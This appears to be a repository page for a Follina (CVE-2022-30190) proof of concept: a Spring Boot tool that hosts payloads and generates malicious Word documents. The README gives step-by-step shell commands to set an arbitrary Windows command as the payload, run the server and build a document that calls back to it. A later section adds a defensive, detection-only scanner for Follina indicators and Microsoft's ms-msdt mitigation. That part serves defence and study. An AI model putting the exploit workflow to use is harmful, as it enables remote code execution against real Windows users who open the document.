
CVE-2022-30190 PoC — Microsoft Windows Support Diagnostic Tool OS command injection vulnerability

Source
Related vulnerability
Title: Microsoft Windows Support Diagnostic Tool OS command injection vulnerability (CVE-2022-30190)
Description: Microsoft Windows Support Diagnostic Tool is a tool from Microsoft (USA) that collects information to send to Microsoft Support. Microsoft Windows Support Diagnostic Tool (MSDT) contains an OS command injection vulnerability. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows
Description
Server to host/activate Follina payloads & generator of malicious Word documents exploiting the MS-MSDT protocol. (CVE-2022-30190)
Introduction
# Follina MS-MSDT exploitation with Spring Boot

This repository contains a simple **Spring Boot** application that acts both as a server to **host/activate Follina payloads**, and as a **generator for malicious Word documents** that are ready to be used as attack vectors to exploit [CVE-2022-30190](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190).

This vulnerability consists of **Remote Code Execution** through MSDT *(Microsoft Windows Support Diagnostic Tool)*.

## Server-Side Payload

In order to serve a unique payload of your choice, you should:

- define the **payload**, e.g.:
```sh
export FOLLINA_PAYLOAD="notepad.exe"
```
- run the **server** to host the static payload:
```sh
mvn spring-boot:run
```
- generate the "Follina" **Word document** (the URL is quoted so the shell does not treat `?` as a glob):
```sh
curl -s 'http://localhost:8080/generateDoc?address=http://192.168.64.128:8080' -o follina.doc
```

**If you'd like to change the current payload, you'd have to tear down the currently active server first**, and repeat the steps after defining the newer payload.

**NOTE:** the payload can be replaced with whatever other command, as long as it can be run via the Windows CMD.


## Client-Side Payload

In order to serve a client-side payload of your choice, you should:

- run the **server** to activate the payloads at runtime:
```sh
mvn spring-boot:run
```
- generate the "Follina" **Word document** specifying the `cmd` query parameter, e.g.:
```sh
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
```

**The payload in this case is embedded within the document**, and will simply need *activation* by contacting the server. In this way, you can have multiple different payloads spread over different documents and you won't have to restart the server to trigger payload changes, as you can simply generate a new document with the desired payload embedded.
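Both workflows above produce a Word document that reaches MSDT through the MS-MSDT protocol, and Follina documents in Office Open XML (.docx) form do so through an OLE object relationship whose target is an external URL, with the `ms-msdt:` reference usually living in the HTML fetched from that URL rather than in the document itself. The scanner below is an added, detection-only example written for this page; it is not part of this repository or of John Hammond's tool. It uses only the Python standard library. `build_docx`, `BENIGN_RELS` and `SUSPICIOUS_RELS` are constructed fixtures for the demonstration, not real documents, and carry no payload. It flags an external `oleObject` relationship as the primary indicator, reports any `ms-msdt:` string found inside the package as a secondary one, and refuses non-zip input, since a legacy binary `.doc` container (the output of the `curl` commands is named `follina.doc`, but its actual format is not stated on this page) would need an OLE parser instead.

```python
"""Scan a Word .docx package for the structural indicators of a
Follina-style (CVE-2022-30190) document. Detection-only, stdlib only."""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
# Handler scheme abused by Follina; matched case-insensitively on raw bytes
# so it is found in XML, HTML and binary parts alike.
MSDT_SCHEME = re.compile(rb"ms-msdt:", re.IGNORECASE)


def _scan_rels(part_name: str, blob: bytes) -> List[str]:
    """Flag OLE object relationships that point outside the package."""
    findings: List[str] = []
    try:
        root = ET.fromstring(blob)
    except ET.ParseError:
        return [f"{part_name}: relationships part is not well-formed XML"]
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        rel_type = rel.get("Type", "")
        target = rel.get("Target", "")
        external = rel.get("TargetMode", "").lower() == "external"
        if rel_type == OLE_REL_TYPE and external:
            findings.append(f"{part_name}: external OLE object target {target}")
    return findings


def scan_docx(data: bytes) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return ["not an OOXML (zip) package; a legacy binary .doc needs an OLE parser"]
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part_name in zf.namelist():
            blob = zf.read(part_name)
            if part_name.endswith(".rels"):
                findings.extend(_scan_rels(part_name, blob))
            if MSDT_SCHEME.search(blob):
                findings.append(f"{part_name}: reference to the ms-msdt: handler")
    return findings


def build_docx(rels_xml: str, extra_parts: Optional[Dict[str, str]] = None) -> bytes:
    """Constructed test fixture: a minimal docx-shaped zip built in memory.
    It is not a usable Word document and carries no payload."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
        for name, body in (extra_parts or {}).items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed sample relationship parts for the benign and suspicious cases.
BENIGN_RELS = (
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
    'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    '</Relationships>'
)
SUSPICIOUS_RELS = (
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" '
    'Target="http://example.invalid/page.html" TargetMode="External"/>'
    '</Relationships>'
)

if __name__ == "__main__":
    # Usage: python scan_docx.py suspect.docx
    with open(sys.argv[1], "rb") as fh:
        for line in scan_docx(fh.read()) or ["no Follina indicators found"]:
            print(line)
```

Run it as `python scan_docx.py suspect.docx` on a quarantined sample; an external OLE object relationship alone is enough to pull a file for analysis, since benign documents embed OLE objects internally. On the mitigation side, Microsoft's published workaround for CVE-2022-30190 was to disable the `ms-msdt` URL protocol handler (backing up and then deleting the `HKEY_CLASSES_ROOT\ms-msdt` registry key), which blocks the activation step regardless of which payload the document carries.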

### Kudos
Many thanks to [John Hammond](https://github.com/JohnHammond/msdt-follina) for publishing the Python implementation and sharing his analysis of the CVE.